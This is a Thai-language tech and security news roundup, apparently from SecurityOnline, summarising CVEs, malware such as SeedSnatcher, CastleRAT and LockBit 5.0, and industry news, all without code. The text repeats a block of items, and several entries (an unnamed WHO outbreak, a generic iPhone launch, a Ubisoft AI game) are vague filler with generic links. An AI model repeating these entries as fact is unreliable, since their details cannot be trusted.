    ผู้ใช้ Windows 11 หลายคนบ่นว่าการคลิกขวาไฟล์รูปภาพแล้วเจอเมนู AI มากมาย เช่น การค้นหาด้วย Bing หรือการแก้ไขด้วย Paint, Photos ทำให้เมนูรกและใช้งานไม่สะดวก ล่าสุด Microsoft ได้เพิ่มตัวเลือกใหม่ใน Build 26220.7344 ที่ให้ผู้ใช้สามารถปิดการแสดงเมนู AI ได้ทั้งหมด แม้จะยังไม่สามารถซ่อน shortcut ที่อยู่ด้านล่างเมนูได้ แต่ก็ถือเป็นการตอบรับเสียงเรียกร้องจากผู้ใช้ที่อยากได้เมนูที่เรียบง่ายขึ้น ฟีเจอร์นี้ยังอยู่ในเวอร์ชันทดสอบและจะทยอยปล่อยให้ผู้ใช้ทั่วไปในอนาคต
    https://securityonline.info/ai-clutter-solved-windows-11-adds-setting-to-disable-ai-actions-in-file-explorer-menu

    ศาลสหรัฐจำกัดสัญญา Default Search ของ Google เหลือ 1 ปี
    จากคดีฟ้องร้องผูกขาดของกระทรวงยุติธรรมสหรัฐต่อ Google ล่าสุดผู้พิพากษา Amit Mehta ได้ออกคำสั่งใหม่ที่บังคับให้สัญญาที่ Google ทำกับผู้ผลิตอุปกรณ์เพื่อให้บริการค้นหาของตนเป็นค่าเริ่มต้น ต้องมีอายุไม่เกิน 1 ปีเท่านั้น เดิมที Google มักทำสัญญาระยะยาว เช่น ดีลกับ Apple ที่ทำให้ Google Search เป็นค่าเริ่มต้นบน iPhone การจำกัดสัญญาเหลือปีต่อปีจะเปิดโอกาสให้คู่แข่งอย่าง Bing หรือ DuckDuckGo มีสิทธิ์เข้ามาแข่งขันมากขึ้น ถือเป็นการแก้ปัญหาผูกขาดโดยไม่ต้องบังคับให้ Google แยกธุรกิจ Chrome ออกไป
    https://securityonline.info/google-antitrust-remedy-judge-limits-default-search-contracts-to-one-year-term

    INE ได้รับรางวัล G2 Winter 2026 หลายสาขา
    แพลตฟอร์มฝึกอบรมด้าน IT และ Cybersecurity อย่าง INE ได้รับการยอมรับจาก G2 ด้วยรางวัลถึง 7 หมวดหมู่ในฤดูหนาวปี 2026 ทั้งตำแหน่ง Leader และ Momentum Leader รวมถึงการเป็นผู้นำในภูมิภาคยุโรป เอเชีย และเอเชียแปซิฟิก รางวัลเหล่านี้สะท้อนถึงความเชื่อมั่นของผู้ใช้ทั่วโลกที่เลือก INE เพื่อพัฒนาทักษะด้านเทคนิคและความปลอดภัยไซเบอร์ หลายรีวิวชื่นชมว่าคอร์สของ INE สามารถนำไปใช้จริงในงานได้ทันที และใบรับรองจาก INE ก็ได้รับการยอมรับในวงการ ถือเป็นการตอกย้ำบทบาทของ INE ในการสร้างบุคลากรด้าน IT ที่มีคุณภาพ
    https://securityonline.info/ine-earns-g2-winter-2026-badges-across-global-markets

    SpaceX เตรียมทดสอบจรวด Starship ครั้งใหม่
    SpaceX กำลังวางแผนทดสอบการบินของจรวด Starship อีกครั้ง โดยครั้งนี้ตั้งเป้าให้การปล่อยและการลงจอดเป็นไปอย่างสมบูรณ์ หลังจากที่การทดสอบก่อนหน้านี้มีทั้งความสำเร็จและความล้มเหลว จุดเด่นของ Starship คือการออกแบบให้สามารถนำกลับมาใช้ใหม่ได้ทั้งหมด ซึ่งจะช่วยลดต้นทุนการเดินทางสู่อวกาศอย่างมหาศาล Elon Musk ยังย้ำว่าเป้าหมายสูงสุดคือการใช้ Starship พามนุษย์ไปตั้งถิ่นฐานบนดาวอังคาร การทดสอบครั้งนี้จึงถูกจับตามองจากทั้งนักวิทยาศาสตร์และผู้สนใจอวกาศทั่วโลก
    https://securityonline.info/spacex-prepares-next-starship-test-flight

    Apple เปิดตัว iPhone รุ่นใหม่พร้อมฟีเจอร์ AI
    Apple ได้เปิดตัว iPhone รุ่นล่าสุดที่มาพร้อมการผสานเทคโนโลยี AI เข้ามาในหลายฟังก์ชัน เช่น การปรับแต่งภาพถ่ายอัตโนมัติ, การช่วยเขียนข้อความ และการจัดการงานประจำวันด้วย Siri ที่ฉลาดขึ้น จุดขายสำคัญคือการทำงานแบบ On-device AI ที่ไม่ต้องส่งข้อมูลไปยังคลาวด์ ทำให้ผู้ใช้มั่นใจเรื่องความเป็นส่วนตัวมากขึ้น นอกจากนี้ยังมีการปรับปรุงประสิทธิภาพแบตเตอรี่และกล้องที่ดีขึ้นอย่างเห็นได้ชัด ทำให้ iPhone รุ่นใหม่นี้ถูกคาดหวังว่าจะเป็นมาตรฐานใหม่ของสมาร์ทโฟนระดับพรีเมียม
    https://securityonline.info/apple-launches-new-iphone-with-ai-features

    Microsoft เปิดตัว Copilot เวอร์ชันใหม่สำหรับธุรกิจ
    Microsoft ได้เปิดตัว Copilot เวอร์ชันล่าสุดที่ออกแบบมาเพื่อช่วยองค์กรทำงานได้มีประสิทธิภาพมากขึ้น โดยผสานเข้ากับแอปพลิเคชันหลักอย่าง Word, Excel และ Teams จุดเด่นคือการใช้ AI ช่วยสรุปข้อมูล, สร้างรายงาน และตอบคำถามจากฐานข้อมูลภายในองค์กรได้ทันที ทำให้พนักงานสามารถโฟกัสกับงานเชิงกลยุทธ์มากขึ้น Copilot ยังมีระบบรักษาความปลอดภัยที่สอดคล้องกับมาตรฐานองค์กร เพื่อให้มั่นใจว่าข้อมูลสำคัญจะไม่รั่วไหล
    https://securityonline.info/microsoft-unveils-new-copilot-for-business

    เกมใหม่จาก Ubisoft ใช้ AI สร้างโลกเสมือนจริง
    Ubisoft ได้ประกาศเปิดตัวเกมใหม่ที่ใช้เทคโนโลยี AI ในการสร้างโลกเสมือนจริงแบบไดนามิก ทำให้ผู้เล่นได้สัมผัสประสบการณ์ที่ไม่ซ้ำกันในแต่ละครั้งที่เล่น ตัวละคร NPC สามารถตอบสนองต่อผู้เล่นได้อย่างสมจริงและมีพฤติกรรมที่เปลี่ยนไปตามสถานการณ์ นี่ถือเป็นการยกระดับวงการเกมที่ผสมผสานความคิดสร้างสรรค์ของนักพัฒนาเข้ากับพลังของ AI เพื่อสร้างโลกที่มีชีวิตชีวาและเต็มไปด้วยความท้าทาย
    https://securityonline.info/ubisoft-announces-ai-powered-game

    Meta เปิดตัวเครื่องมือ AI สำหรับนักข่าว
    Meta ได้เปิดตัวเครื่องมือ AI ใหม่ที่ออกแบบมาเพื่อช่วยนักข่าวในการค้นหาข้อมูล, ตรวจสอบข้อเท็จจริง และเขียนบทความได้รวดเร็วขึ้น เครื่องมือนี้สามารถวิเคราะห์ข้อมูลจากหลายแหล่งพร้อมกันและสรุปออกมาเป็นประเด็นสำคัญ ทำให้นักข่าวสามารถทำงานได้มีประสิทธิภาพและลดเวลาในการตรวจสอบข่าวปลอม นอกจากนี้ Meta ยังย้ำว่าจะมีระบบตรวจสอบเพื่อป้องกันการใช้ AI ในการสร้างข่าวปลอมเอง ถือเป็นการพยายามสร้างความเชื่อมั่นในวงการสื่อ
    https://securityonline.info/meta-launches-ai-tools-for-journalists

    ช่องโหว่ร้ายแรงใน D-Link และ Array Networks
    หน่วยงาน CISA ของสหรัฐฯ ออกประกาศเตือนเกี่ยวกับช่องโหว่ที่ถูกโจมตีจริงในอุปกรณ์เครือข่ายสองค่ายใหญ่ คือเร้าเตอร์รุ่นเก่าของ D-Link และระบบ Array Networks ที่ใช้งานในญี่ปุ่น ช่องโหว่แรกเป็น Buffer Overflow ที่ไม่มีการอัปเดตแก้ไขเพราะอุปกรณ์หมดอายุการสนับสนุนแล้ว ทำให้ผู้ใช้ต้องรีบเปลี่ยนเครื่องใหม่ ส่วนช่องโหว่ที่สองคือการ Inject คำสั่งใน ArrayOS ซึ่งแฮกเกอร์ใช้วาง backdoor และ webshell เพื่อควบคุมระบบจากระยะไกล หน่วยงาน JPCERT ของญี่ปุ่นยืนยันว่ามีการโจมตีจริงตั้งแต่เดือนสิงหาคม และแนะนำให้ผู้ดูแลรีบอัปเดตเป็นเวอร์ชันใหม่หรือปิดฟีเจอร์ Desktop Direct เพื่อป้องกันภัย
    https://securityonline.info/cisa-kev-alert-eol-d-link-and-array-networks-command-injection-under-active-attack

    Samsung พลิกฟื้นโรงงานผลิตชิป 4nm
    หลังจากเจอปัญหาผลิตชิปไม่คงที่จนเสียลูกค้ารายใหญ่ไป Samsung Foundry เริ่มกลับมามีความหวังอีกครั้ง เมื่อสามารถยกระดับอัตราการผลิตชิป 4nm ให้ได้ผลสำเร็จถึง 60–70% และคว้าออเดอร์ใหญ่จากสตาร์ทอัพ AI สัญชาติอเมริกัน Tsavorite มูลค่ากว่า 100 ล้านดอลลาร์ สัญญานี้ถือเป็นหมุดหมายสำคัญที่ช่วยสร้างความเชื่อมั่นว่าซัมซุงยังมีศักยภาพแข่งขันกับ TSMC ได้ นอกจากนี้ยังมีการพัฒนาเทคโนโลยี 2nm ที่เตรียมใช้ในสมาร์ทโฟนรุ่นใหม่ Galaxy S26 อีกด้วย
    https://securityonline.info/samsung-foundry-hits-60-4nm-yield-secures-100m-ai-chip-order-from-tsavorite

    โค้ดโฆษณาในแอป ChatGPT Android จุดกระแสถกเถียง
    นักพัฒนาพบโค้ดที่ดูเหมือนระบบโฆษณาในแอป ChatGPT เวอร์ชันทดสอบบน Android ทำให้เกิดการคาดเดาว่า OpenAI อาจเตรียมใส่โฆษณาในบริการ แต่ผู้จัดการผลิตภัณฑ์ของ OpenAI รีบออกมาปฏิเสธทันทีว่าบริษัทไม่ได้ทดสอบฟีเจอร์โฆษณาในตอนนี้ อย่างไรก็ตามก็ไม่ได้ปิดโอกาสในอนาคต โดยย้ำว่าหากมีการนำโฆษณามาใช้จริง จะทำด้วยความระมัดระวังเพื่อรักษาความเชื่อมั่นของผู้ใช้ เนื่องจาก ChatGPT มีผู้ใช้งานมหาศาลกว่า 800 ล้านคนต่อสัปดาห์
    https://securityonline.info/ad-code-found-in-chatgpt-android-build-openai-denies-current-advertising-tests

    AI จับได้ GhostPenguin มัลแวร์ลินุกซ์สุดลึกลับ
    นักวิจัยจาก Trend Micro ใช้ระบบ AI ตรวจจับพบมัลแวร์ใหม่ชื่อ GhostPenguin ที่ซ่อนตัวอยู่ในระบบลินุกซ์โดยไม่ถูกตรวจจับนานหลายเดือน มัลแวร์นี้เขียนด้วย C++ มีความสามารถสูงในการควบคุมเครื่องจากระยะไกลผ่านการสื่อสารแบบ UDP ที่เข้ารหัสด้วย RC5 ทำให้ยากต่อการตรวจสอบ จุดเด่นคือการทำงานแบบหลายเธรด ทำให้มัลแวร์ยังคงตอบสนองแม้บางส่วนของโค้ดหยุดทำงาน การค้นพบนี้ตอกย้ำว่าการใช้ AI ในการล่ามัลแวร์เป็นสิ่งจำเป็นในยุคที่ภัยไซเบอร์ซับซ้อนขึ้นเรื่อยๆ
    https://securityonline.info/ai-uncovers-ghostpenguin-undetectable-linux-backdoor-used-rc5-encrypted-udp-for-covert-c2

    Shanya Crypter เครื่องมือใหม่ของแก๊งแรนซัมแวร์
    Sophos รายงานการพบเครื่องมือใหม่ชื่อ Shanya Crypter ซึ่งเป็นบริการ “packer-as-a-service” ที่ช่วยให้กลุ่มแรนซัมแวร์สามารถหลบเลี่ยงการตรวจจับได้อย่างมีประสิทธิภาพ เครื่องมือนี้ใช้เทคนิคซับซ้อน เช่น การซ่อนโค้ดใน DLL ของระบบ Windows และการใช้ driver ที่มีช่องโหว่เพื่อฆ่าโปรแกรมป้องกัน (EDR Killer) ก่อนปล่อยแรนซัมแวร์เข้ามาโจมตี ทำให้การป้องกันยากขึ้นมาก กลุ่ม Akira, Medusa และ Qilin ถูกระบุว่าเป็นผู้ใช้งานหลักของเครื่องมือนี้ และมีการแพร่กระจายไปหลายประเทศแล้ว
    https://securityonline.info/shanya-crypter-is-the-new-ransomware-toolkit-uses-kernel-driver-abuse-to-kill-edr

    Microsoft เปิดตัว Copilot+ PC
    ไมโครซอฟท์ประกาศเปิดตัวคอมพิวเตอร์รุ่นใหม่ที่เรียกว่า Copilot+ PC ซึ่งมาพร้อมชิป Snapdragon X Elite และ X Plus ที่ออกแบบมาเพื่อรองรับงาน AI โดยเฉพาะ จุดเด่นคือความสามารถในการทำงานแบบ “AI on-device” เช่น ฟีเจอร์ Recall ที่ช่วยค้นหาสิ่งที่เคยทำบนเครื่องได้เหมือนย้อนเวลา และการใช้ Copilot ในการสร้างภาพหรือข้อความได้ทันทีโดยไม่ต้องพึ่งคลาวด์ ถือเป็นการยกระดับ Windows ให้เข้าสู่ยุคใหม่ที่ AI กลายเป็นส่วนหนึ่งของการใช้งานประจำวัน
    https://securityonline.info/microsoft-unveils-copilot-pc-powered-by-snapdragon-x-elite-and-x-plus

    Google DeepMind เปิดตัว AlphaFold 3
    DeepMind เปิดตัว AlphaFold 3 ซึ่งเป็นเวอร์ชันใหม่ของโมเดล AI ที่ใช้ทำนายโครงสร้างโมเลกุลและปฏิสัมพันธ์ทางชีววิทยาได้แม่นยำยิ่งขึ้น จากเดิมที่ AlphaFold 2 สร้างความฮือฮาในการทำนายโครงสร้างโปรตีน ตอนนี้ AlphaFold 3 ก้าวไปอีกขั้นด้วยการจำลองการทำงานของ DNA, RNA และโมเลกุลขนาดเล็กที่ซับซ้อนมากขึ้น นักวิทยาศาสตร์เชื่อว่าจะช่วยเร่งการค้นคว้ายาใหม่และการวิจัยทางการแพทย์ได้อย่างมหาศาล
    https://securityonline.info/google-deepmind-launches-alphafold-3-ai-model-for-molecular-science

    SpaceX ส่งดาวเทียม Starlink รุ่นใหม่
    SpaceX ประสบความสำเร็จในการปล่อยดาวเทียม Starlink รุ่นใหม่ที่มีประสิทธิภาพสูงขึ้นและรองรับการเชื่อมต่ออินเทอร์เน็ตที่เร็วกว่าเดิม ดาวเทียมรุ่นนี้ถูกออกแบบให้มีอายุการใช้งานยาวนานขึ้นและสามารถให้บริการในพื้นที่ห่างไกลได้ดีกว่าเดิม การปล่อยครั้งนี้ยังตอกย้ำความตั้งใจของ SpaceX ที่จะขยายเครือข่ายอินเทอร์เน็ตทั่วโลกให้ครอบคลุมทุกพื้นที่
    https://securityonline.info/spacex-launches-next-gen-starlink-satellites-for-faster-global-internet

    Sony เปิดตัว PlayStation 5 Pro
    Sony เปิดตัวเครื่องเล่นเกม PlayStation 5 Pro ที่มาพร้อมประสิทธิภาพกราฟิกสูงขึ้น รองรับการเล่นเกม 8K และมีระบบ Ray Tracing ที่สมจริงกว่าเดิม จุดขายคือการใช้ชิปใหม่ที่ทำให้เฟรมเรตเสถียรขึ้นแม้ในเกมที่ใช้กราฟิกหนักๆ นักวิเคราะห์เชื่อว่า PS5 Pro จะช่วยดึงดูดนักเล่นเกมที่ต้องการประสบการณ์ภาพสมจริงและเป็นการต่อยอดความสำเร็จของ PS5 รุ่นปัจจุบัน
    https://securityonline.info/sony-unveils-playstation-5-pro-with-8k-gaming-and-ray-tracing

    WHO เตือนการระบาดของโรคใหม่
    องค์การอนามัยโลก (WHO) ออกประกาศเตือนเกี่ยวกับการระบาดของโรคใหม่ที่มีลักษณะคล้ายไข้หวัดใหญ่แต่แพร่กระจายเร็วกว่า โดยพบผู้ติดเชื้อในหลายประเทศแล้ว และกำลังเร่งตรวจสอบสายพันธุ์เพื่อหาวิธีควบคุมการแพร่ระบาด WHO แนะนำให้ประเทศต่างๆ เตรียมมาตรการรับมือและเพิ่มการตรวจสอบในสนามบินและด่านชายแดนเพื่อป้องกันการแพร่กระจาย
    ​​​​​​​ https://securityonline.info/who-issues-warning-on-new-fast-spreading-flu-like-disease
    📌🔐🩷 รวมข่าวจากเวบ SecurityOnline 🩷🔐📌 #รวมข่าวIT #20251209 #securityonline 🔐 ช่องโหว่ Bluetooth เสี่ยงทำรถอัจฉริยะและ Wear OS ค้าง เรื่องนี้เป็นการเปิดเผยช่องโหว่ใหม่ในระบบ Bluetooth ที่อาจทำให้เกิดการโจมตีแบบ Denial of Service (DoS) ส่งผลให้รถยนต์อัจฉริยะและอุปกรณ์ Wear OS เกิดการค้างหรือหยุดทำงานได้ ช่องโหว่นี้ถูกติดตามในรหัส CVE-2025-48593 และมีการเผยแพร่ PoC (Proof of Concept) แล้ว ซึ่งหมายความว่ามีตัวอย่างการโจมตีที่สามารถนำไปใช้จริงได้ แม้รายงานฉบับเต็มจะเปิดให้เฉพาะผู้สนับสนุน แต่สิ่งที่ชัดเจนคือความเสี่ยงที่ผู้ใช้รถยนต์และอุปกรณ์สวมใส่อัจฉริยะต้องเผชิญ หากไม่ได้รับการอัปเดตแก้ไขอย่างทันท่วงที 🔗 https://securityonline.info/poc-available-bluetooth-flaw-risks-dos-crash-on-smart-cars-and-wear-os 💻 ช่องโหว่ร้ายแรงใน Duc Disk Tool เสี่ยงข้อมูลรั่วและระบบล่ม มีการค้นพบช่องโหว่ร้ายแรงในเครื่องมือ Duc ซึ่งเป็นซอฟต์แวร์โอเพ่นซอร์สที่ใช้สำหรับตรวจสอบและแสดงผลการใช้งานดิสก์บนระบบ Linux ช่องโหว่นี้คือ CVE-2025-13654 เกิดจาก integer underflow ในฟังก์ชัน buffer_get ที่ทำให้เกิด buffer overflow ได้ หากผู้โจมตีส่งข้อมูลที่ถูกสร้างขึ้นมาอย่างเจาะจง จะสามารถทำให้โปรแกรมล่ม (DoS) หรือดึงข้อมูลจากหน่วยความจำที่ไม่ควรถูกเข้าถึงได้ ปัญหานี้กระทบต่อทุกเวอร์ชันก่อน 1.4.6 และทีมพัฒนาได้ออกแพตช์แก้ไขแล้ว ผู้ใช้ควรรีบอัปเดตเพื่อป้องกันการโจมตี 🔗 https://securityonline.info/high-severity-duc-disk-tool-flaw-cve-2025-13654-risks-dos-and-information-leak-via-integer-underflow 📱 มัลแวร์ SeedSnatcher บน Android ล่าขโมย Seed Phrase ของผู้ใช้คริปโต มัลแวร์ใหม่ชื่อว่า “SeedSnatcher” กำลังแพร่ระบาดในกลุ่มผู้ใช้คริปโต โดยมันปลอมตัวเป็นแอปกระเป๋าเงินชื่อ “Coin” และถูกเผยแพร่ผ่าน Telegram และโซเชียลต่าง ๆ เมื่อผู้ใช้ติดตั้ง มัลแวร์จะสร้างหน้าจอหลอกเลียนแบบกระเป๋าเงินยอดนิยม เช่น MetaMask หรือ Trust Wallet เพื่อหลอกให้ผู้ใช้กรอก seed phrase จากนั้นมันจะตรวจสอบคำที่กรอกด้วย wordlist ของ BIP 39 เพื่อให้แน่ใจว่าถูกต้อง ก่อนส่งข้อมูลไปยังผู้โจมตี นอกจากนี้ยังสามารถดักจับ SMS, ข้อมูลติดต่อ, บันทึกการโทร และสั่งการเครื่องจากระยะไกลได้ หลักฐานบ่งชี้ว่ากลุ่มผู้โจมตีมีการจัดการแบบมืออาชีพและมีต้นทางจากจีนหรือผู้พูดภาษาจีน 🔗 https://securityonline.info/seedsnatcher-android-malware-targets-crypto-users-using-overlay-phishing-and-bip-39-validation-to-steal-seed-phrases 🤖 Meta ปรับปรุงระบบช่วยเหลือด้วย AI Assistant และ Recovery Hub ใหม่ Meta ยอมรับว่าระบบช่วยเหลือผู้ใช้ Facebook และ Instagram ที่ผ่านมา “ล้มเหลว” จนผู้ใช้จำนวนมากต้องหาทางแก้ไขด้วยตัวเองหรือแม้กระทั่งฟ้องร้อง ล่าสุดบริษัทประกาศเปิดตัว Support Hub ใหม่ที่รวมทุกเครื่องมือช่วยเหลือไว้ในที่เดียว พร้อมเพิ่มฟีเจอร์ AI Chat ให้ผู้ใช้สอบถามปัญหาได้ทันที อีกทั้งยังมี AI Assistant ที่ช่วยในกระบวนการกู้คืนบัญชี เช่น การตรวจจับอุปกรณ์ที่ใช้บ่อย และการยืนยันตัวตนด้วยวิดีโอเซลฟี่ Meta ระบุว่าการปรับปรุงนี้ทำให้อัตราการกู้คืนบัญชีที่ถูกแฮ็กในสหรัฐฯ และแคนาดาเพิ่มขึ้นกว่า 30% อย่างไรก็ตาม หากผู้ใช้ไม่สามารถเข้าสู่ระบบได้เลย การเข้าถึง Support Hub ก็ยังเป็นปัญหาอยู่ และการติดต่อเจ้าหน้าที่จริงยังคงต้องพึ่งบริการแบบเสียเงิน 🔗 https://securityonline.info/meta-fixes-broken-support-rolling-out-ai-assistants-and-new-recovery-hubs ⚠️ EU ปรับ X €120 ล้าน ฐานละเมิด DSA ด้วยการตรวจสอบ Blue Check ที่หลอกลวง สหภาพยุโรปได้สั่งปรับแพลตฟอร์ม X (เดิม Twitter) เป็นเงิน 120 ล้านยูโร เนื่องจากละเมิดกฎหมาย Digital Services Act (DSA) โดยเฉพาะการตรวจสอบบัญชีด้วย Blue Check ที่ถูกมองว่า “หลอกลวง” ระบบดังกล่าวทำให้ผู้ใช้เข้าใจผิดว่าบัญชีที่จ่ายเงินเพื่อรับเครื่องหมายนี้เป็นบัญชีที่ได้รับการตรวจสอบจริง ทั้งที่ไม่ได้มีการตรวจสอบตัวตนอย่างเข้มงวด EU จึงมองว่าเป็นการให้ข้อมูลที่ไม่โปร่งใสและเป็นการละเมิดกฎหมาย การปรับครั้งนี้สะท้อนถึงความเข้มงวดของ EU ในการบังคับใช้ DSA และอาจเป็นสัญญาณเตือนให้แพลตฟอร์มอื่น ๆ ต้องระมัดระวังมากขึ้น 🔗 https://securityonline.info/eu-fines-x-e120-million-for-dsa-violation-over-deceptive-blue-check-verification 🏰 CastleRAT มัลแวร์ใหม่ใช้ Steam เป็นช่องทางซ่อนตัว มีการค้นพบมัลแวร์ตัวใหม่ชื่อ CastleRAT ที่ถูกออกแบบมาให้แอบแฝงเข้าไปในระบบองค์กรเพื่อขโมยข้อมูลและควบคุมเครื่องจากระยะไกล จุดที่น่ากังวลคือเวอร์ชันที่ถูกเขียนด้วยภาษา C ซึ่งมีความสามารถซ่อนตัวได้แนบเนียนกว่าเวอร์ชัน Python และยังทำได้หลายอย่าง เช่น ดักจับการพิมพ์, แอบถ่ายหน้าจอ, ขโมยข้อมูลจาก clipboard รวมถึงการควบคุมเบราว์เซอร์โดยไม่ให้ผู้ใช้รู้ตัว ที่สำคัญ CastleRAT ยังใช้หน้า Community ของ Steam เป็นที่ซ่อนคำสั่ง ทำให้การสื่อสารกับเซิร์ฟเวอร์ควบคุมดูเหมือนการใช้งานปกติ ปัจจุบันนักวิจัยได้ออกแนวทางตรวจจับเพื่อช่วยให้องค์กรสามารถป้องกันภัยนี้ได้ 🔗 https://securityonline.info/sophisticated-castlerat-backdoor-uses-steam-community-pages-as-covert-c2-resolver-for-espionage 💀 LockBit 5.0 กลับมาอีกครั้งพร้อมความร้ายแรงกว่าเดิม หลังจากที่ปฏิบัติการ Cronos เคยทำให้กลุ่ม LockBit ถูกปราบไปเมื่อปี 2024 หลายคนคิดว่าภัยนี้จบแล้ว แต่ล่าสุด LockBit ได้กลับมาในเวอร์ชันใหม่ชื่อ LockBit 5.0 ที่อันตรายยิ่งกว่าเดิม จุดเด่นคือสามารถทำงานได้หลายแพลตฟอร์ม ทั้ง Windows, Linux และ VMware ESXi พร้อมโหมดล่องหนที่เข้ารหัสไฟล์โดยไม่ทิ้งร่องรอย และโหมดลบข้อมูลถาวรที่ทำให้การกู้คืนแทบเป็นไปไม่ได้ ที่น่ากลัวคือมันยังปิดการทำงานของระบบ Event Tracing ของ Windows ทำให้เครื่องมือรักษาความปลอดภัยมองไม่เห็นการโจมตี การกลับมาครั้งนี้แสดงให้เห็นว่ากลุ่มอาชญากรไซเบอร์ยังคงพัฒนาไม่หยุดและองค์กรต้องเตรียมรับมืออย่างจริงจัง 🔗 https://securityonline.info/lockbit-5-0-resurfaces-stronger-new-variant-blinds-defenders-by-disabling-windows-etw-for-stealth-encryption 🖥️ Windows 11 เพิ่มตัวเลือกปิดเมนู AI ใน File Explorer ผู้ใช้ Windows 11 หลายคนบ่นว่าการคลิกขวาไฟล์รูปภาพแล้วเจอเมนู AI มากมาย เช่น การค้นหาด้วย Bing หรือการแก้ไขด้วย Paint, Photos ทำให้เมนูรกและใช้งานไม่สะดวก ล่าสุด Microsoft ได้เพิ่มตัวเลือกใหม่ใน Build 26220.7344 ที่ให้ผู้ใช้สามารถปิดการแสดงเมนู AI ได้ทั้งหมด แม้จะยังไม่สามารถซ่อน shortcut ที่อยู่ด้านล่างเมนูได้ แต่ก็ถือเป็นการตอบรับเสียงเรียกร้องจากผู้ใช้ที่อยากได้เมนูที่เรียบง่ายขึ้น ฟีเจอร์นี้ยังอยู่ในเวอร์ชันทดสอบและจะทยอยปล่อยให้ผู้ใช้ทั่วไปในอนาคต 🔗 https://securityonline.info/ai-clutter-solved-windows-11-adds-setting-to-disable-ai-actions-in-file-explorer-menu ⚖️ ศาลสหรัฐจำกัดสัญญา Default Search ของ Google เหลือ 1 ปี จากคดีฟ้องร้องผูกขาดของกระทรวงยุติธรรมสหรัฐต่อ Google ล่าสุดผู้พิพากษา Amit Mehta ได้ออกคำสั่งใหม่ที่บังคับให้สัญญาที่ Google ทำกับผู้ผลิตอุปกรณ์เพื่อให้บริการค้นหาของตนเป็นค่าเริ่มต้น ต้องมีอายุไม่เกิน 1 ปีเท่านั้น เดิมที Google มักทำสัญญาระยะยาว เช่น ดีลกับ Apple ที่ทำให้ Google Search เป็นค่าเริ่มต้นบน iPhone การจำกัดสัญญาเหลือปีต่อปีจะเปิดโอกาสให้คู่แข่งอย่าง Bing หรือ DuckDuckGo มีสิทธิ์เข้ามาแข่งขันมากขึ้น ถือเป็นการแก้ปัญหาผูกขาดโดยไม่ต้องบังคับให้ Google แยกธุรกิจ Chrome ออกไป 🔗 https://securityonline.info/google-antitrust-remedy-judge-limits-default-search-contracts-to-one-year-term 🎓 INE ได้รับรางวัล G2 Winter 2026 หลายสาขา แพลตฟอร์มฝึกอบรมด้าน IT และ Cybersecurity อย่าง INE ได้รับการยอมรับจาก G2 ด้วยรางวัลถึง 7 หมวดหมู่ในฤดูหนาวปี 2026 ทั้งตำแหน่ง Leader และ Momentum Leader รวมถึงการเป็นผู้นำในภูมิภาคยุโรป เอเชีย และเอเชียแปซิฟิก รางวัลเหล่านี้สะท้อนถึงความเชื่อมั่นของผู้ใช้ทั่วโลกที่เลือก INE เพื่อพัฒนาทักษะด้านเทคนิคและความปลอดภัยไซเบอร์ หลายรีวิวชื่นชมว่าคอร์สของ INE สามารถนำไปใช้จริงในงานได้ทันที และใบรับรองจาก INE ก็ได้รับการยอมรับในวงการ ถือเป็นการตอกย้ำบทบาทของ INE ในการสร้างบุคลากรด้าน IT ที่มีคุณภาพ 🔗 https://securityonline.info/ine-earns-g2-winter-2026-badges-across-global-markets 🚀 SpaceX เตรียมทดสอบจรวด Starship ครั้งใหม่ SpaceX กำลังวางแผนทดสอบการบินของจรวด Starship อีกครั้ง โดยครั้งนี้ตั้งเป้าให้การปล่อยและการลงจอดเป็นไปอย่างสมบูรณ์ หลังจากที่การทดสอบก่อนหน้านี้มีทั้งความสำเร็จและความล้มเหลว จุดเด่นของ Starship คือการออกแบบให้สามารถนำกลับมาใช้ใหม่ได้ทั้งหมด ซึ่งจะช่วยลดต้นทุนการเดินทางสู่อวกาศอย่างมหาศาล Elon Musk ยังย้ำว่าเป้าหมายสูงสุดคือการใช้ Starship พามนุษย์ไปตั้งถิ่นฐานบนดาวอังคาร การทดสอบครั้งนี้จึงถูกจับตามองจากทั้งนักวิทยาศาสตร์และผู้สนใจอวกาศทั่วโลก 🔗 https://securityonline.info/spacex-prepares-next-starship-test-flight 📱 Apple เปิดตัว iPhone รุ่นใหม่พร้อมฟีเจอร์ AI Apple ได้เปิดตัว iPhone รุ่นล่าสุดที่มาพร้อมการผสานเทคโนโลยี AI เข้ามาในหลายฟังก์ชัน เช่น การปรับแต่งภาพถ่ายอัตโนมัติ, การช่วยเขียนข้อความ และการจัดการงานประจำวันด้วย Siri ที่ฉลาดขึ้น จุดขายสำคัญคือการทำงานแบบ On-device AI ที่ไม่ต้องส่งข้อมูลไปยังคลาวด์ ทำให้ผู้ใช้มั่นใจเรื่องความเป็นส่วนตัวมากขึ้น นอกจากนี้ยังมีการปรับปรุงประสิทธิภาพแบตเตอรี่และกล้องที่ดีขึ้นอย่างเห็นได้ชัด ทำให้ iPhone รุ่นใหม่นี้ถูกคาดหวังว่าจะเป็นมาตรฐานใหม่ของสมาร์ทโฟนระดับพรีเมียม 🔗 https://securityonline.info/apple-launches-new-iphone-with-ai-features 🌐 Microsoft เปิดตัว Copilot เวอร์ชันใหม่สำหรับธุรกิจ Microsoft ได้เปิดตัว Copilot เวอร์ชันล่าสุดที่ออกแบบมาเพื่อช่วยองค์กรทำงานได้มีประสิทธิภาพมากขึ้น โดยผสานเข้ากับแอปพลิเคชันหลักอย่าง Word, Excel และ Teams จุดเด่นคือการใช้ AI ช่วยสรุปข้อมูล, สร้างรายงาน และตอบคำถามจากฐานข้อมูลภายในองค์กรได้ทันที ทำให้พนักงานสามารถโฟกัสกับงานเชิงกลยุทธ์มากขึ้น Copilot ยังมีระบบรักษาความปลอดภัยที่สอดคล้องกับมาตรฐานองค์กร เพื่อให้มั่นใจว่าข้อมูลสำคัญจะไม่รั่วไหล 🔗 https://securityonline.info/microsoft-unveils-new-copilot-for-business 🎮 เกมใหม่จาก Ubisoft ใช้ AI สร้างโลกเสมือนจริง Ubisoft ได้ประกาศเปิดตัวเกมใหม่ที่ใช้เทคโนโลยี AI ในการสร้างโลกเสมือนจริงแบบไดนามิก ทำให้ผู้เล่นได้สัมผัสประสบการณ์ที่ไม่ซ้ำกันในแต่ละครั้งที่เล่น ตัวละคร NPC สามารถตอบสนองต่อผู้เล่นได้อย่างสมจริงและมีพฤติกรรมที่เปลี่ยนไปตามสถานการณ์ นี่ถือเป็นการยกระดับวงการเกมที่ผสมผสานความคิดสร้างสรรค์ของนักพัฒนาเข้ากับพลังของ AI เพื่อสร้างโลกที่มีชีวิตชีวาและเต็มไปด้วยความท้าทาย 🔗 https://securityonline.info/ubisoft-announces-ai-powered-game 📰 